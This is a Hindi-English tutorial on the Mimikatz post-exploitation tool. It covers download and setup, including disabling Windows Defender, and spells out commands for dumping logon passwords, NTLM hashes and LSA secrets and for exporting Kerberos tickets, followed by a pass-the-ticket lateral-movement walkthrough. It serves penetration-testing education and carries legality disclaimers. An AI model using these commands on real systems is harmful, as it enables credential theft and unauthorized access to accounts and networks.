Mimikatz एक powerful post-exploitation tool है जो Windows systems से passwords, hashes, tickets और other credentials को extract कर सकता है। यह system में already compromised होने के बाद use होता है।
👉 Post-exploitation phase में यह सबसे dangerous और useful tools में से एक है।
🔍 Mimikatz क्या-क्या कर सकता है
Password Extraction
Plain text passwords निकालना
Hash Dump
NTLM hashes extract करना
Kerberos Tickets
Pass-the-ticket attacks
LSA Dump
Local Security Authority secrets
DPAPI Master Keys
Decrypt saved credentials
Privilege Escalation
Token impersonation
⚙️ Windows में Mimikatz install
Download from GitHub (Latest Release)
https://github.com/gentilkiwi/mimikatz/releasesExtract ZIP file
mimikatz_trunk.zip → Extract folderRun as Administrator
Right-click mimikatz.exe → Run as Administrator👉 Note: Windows Defender इसे detect करेगा - testing के लिए disable करना पड़ सकता है
💻 Basic Commands (Use)
👉 Mimikatz interactive shell में commands:
Enter Mimikatz Shell
mimikatz.exeGet Debug Privilege (Required)
privilege::debugList Loaded Modules
module::listExtract Logon Passwords
sekurlsa::logonpasswordsDump LSA Secrets
lsadump::lsa /patchExport Kerberos Tickets
kerberos::list /exportExit
exit🌐 Real Example (Practical समझ)
privilege::debug
sekurlsa::logonpasswords👉 यह command system में logon किए हुए users के passwords extract करता है (plain text और hash दोनों)
मान लो output कुछ ऐसा आता है:
🧠 इसका मतलब:
Administrator account
Domain: WORKSTATION
LM & NTLM Hashes
Password cracking के लिए
Plain text password
P@ssw0rd123 - Direct access
👉 इससे attacker को मिलता है:
- • Plain text password (direct login possible)
- • Password hashes (cracking/spraying के लिए)
- • Domain user details (lateral movement)
🔥 Advanced Example - Pass-the-Ticket Attack
Export Kerberos Tickets
kerberos::list /exportImport Ticket (on target)
kerberos::ptt ticket.kirbi👉 Attack flow:
Extract
User ticket
Transfer
Copy to attacker
Inject
Use ticket
👉 Pass-the-ticket से attacker user की तरह access पा सकता है बिना password के
Mimikatz का use केवल authorized systems पर और proper permission के साथ करो
🚨 Critical Points:
- Illegal: बिना permission किसी भी system पर use करना cyber crime है
- Antivirus Detection: Windows Defender और AV solutions इसे immediately detect करते हैं
- Requires Admin: यह tool administrator privileges के साथ ही run होता है
- Educational Purpose: अपना test lab / VM / authorized systems पर ही practice करो
📌 Legal Note: यह tool security testing और incident response के लिए है, malicious use punishable offense है
🧩 Related Tools
Empire
Post-exploitation framework
PowerSploit
PowerShell exploitation toolkit
LaZagne
Password recovery tool
Rubeus
Kerberos attacks tool
Mimikatz = "Key का Master"
यह Windows से सभी तरह के keys (passwords, hashes, tickets) निकालने में master है। System में एक बार घुसने के बाद, यह आपको admin access दिला सकता है।